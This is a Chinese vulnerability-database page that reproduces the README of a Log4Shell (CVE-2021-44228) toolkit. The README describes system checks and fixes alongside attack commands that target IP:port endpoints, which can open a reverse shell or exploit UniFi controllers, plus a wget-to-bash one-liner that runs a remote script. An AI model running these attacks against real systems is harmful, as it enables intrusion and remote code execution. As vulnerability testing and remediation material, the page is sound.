漏洞平台

POC详情： a9ccbe305e9a6228398a846ee4da3dbaffe7e3eb

来源

https://github.com/suuhm/log4shell4shell

关联漏洞

标题： Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述：Apache Log4j是美国阿帕奇（Apache）基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞，攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器，当该请求被打印成日志时就会触发远程代码执行。

描述

Log4shell - Multi-Toolkit. Find, Fix & Test possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test/attack environment on shell

介绍

# log4shell4shell
Log4j - Multitool. Find &amp; fix possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test/attack environment

![Thumb](/logo_banner.png )

# Features

- Check your Linux/Mac/BSD and Windows System for CVE-2021-44228 vulneraries
- Fix your system by deleting log4j java class / or setting some enviroment variables 
- Proof of Concept: you can run a dummy spring boot server for testing the exploit by yourself (https://github.com/christophetd/log4shell-vulnerable-app)
- You can run a attack against a wished IP-Port and include a Base64 Command / Or A simple Reverse Shell
- Full ip-range scanning by https://github.com/fullhunt/log4j-scan

# How to Run on Linux/Mac/BSD:

## Requirements:

- https://docs.docker.com/get-docker/
- Debian / Ubuntu: ```apt update ; apt install default-jre screen python3-pip bash curl```
- OpenSuse: ```zypper ref ; zypper in default-jre screen python3-pip bash curl```
- Redhead-Linux / CentOS: ```yum clean; yum install default-jre screen python3-pip bash curl```
- BSD pkg: ```pkg install default-jre screen python3-pip curl```
- Mac OS (Brew): ```/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pip```

## Quick check your system with this oneliner:

```bash
wget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system
```

## More Options
### Run a sample attack against IP: 10.4.4.20 Port 8080 loginpage and additionally a Reverse Proxy Shell:

```bash
git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e
```
Run ```screen -r l4s4s-ldap-srv``` and/or ```screen -r l4s4s-nc-rsh``` to view some attacking infos in Exploit-Server shell: 


### Run a full scan  IP: 10.4.4.20 Port 8080 and additionally a try all tests :

```bash
./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"
```

### Run a Proof of Concept on a Tomcat Springboot Server:

```bash
./l4s4s.sh --run-dummy-server && \
./l4s4s.sh --run-attack http://127.0.0.1:4280 -e
```

### Run a Unifi-Controller Exploit Attack/Check (on 10.4.4.20:8443):

```bash
./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post
```

## All available Options

```bash
_|                            _|  _|              _|                  _|  _|  _|  _|              _|                  _|  _|
_|          _|_|      _|_|_|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|
_|        _|    _|  _|    _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|
_|        _|    _|  _|    _|      _|        _|_|  _|    _|  _|        _|  _|      _|        _|_|  _|    _|  _|        _|  _|
_|_|_|_|    _|_|      _|_|_|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|
                          _|
                      _|_|


 > Running Log4shell Framework & Check-Toolkit on shell v0.1a (C) 2021 suuhm

Wrong input! Please enter one of these options:

Usage: ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>

                        --get-powershell-finder
                        --check-system
                        --fix-log4j
                        --run-dummy-server <JNDIExploit.*.zip>
                        --run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
                        --python-scan <command>

```

# How to upgrade your linux and/or macos python version:

Just run my helper-script (--list-versions): ``` ./python-upgrader.sh ```

# How to run on Windows x86 / x64:

Just run in Powershell (admin-mode): ``` .\set_windows_fix.ps1 ```


# This script is alpha! So please let me know if you have some issues

# Legal Disclaimer

The project log4shell4shell is made for educational and ethical testing purposes only. Usage of log4j-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

文件快照


 [4.0K]  /data/pocs/a9ccbe305e9a6228398a846ee4da3dbaffe7e3eb
├── [ 34K]  LICENSE
├── [9.6K]  log4shell4shell.sh
├── [6.5K]  logo_banner.png
├── [1.1K]  python_upgrader.sh
├── [4.1K]  README.md
└── [ 663]  set_windows_fix.ps1

0 directories, 6 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。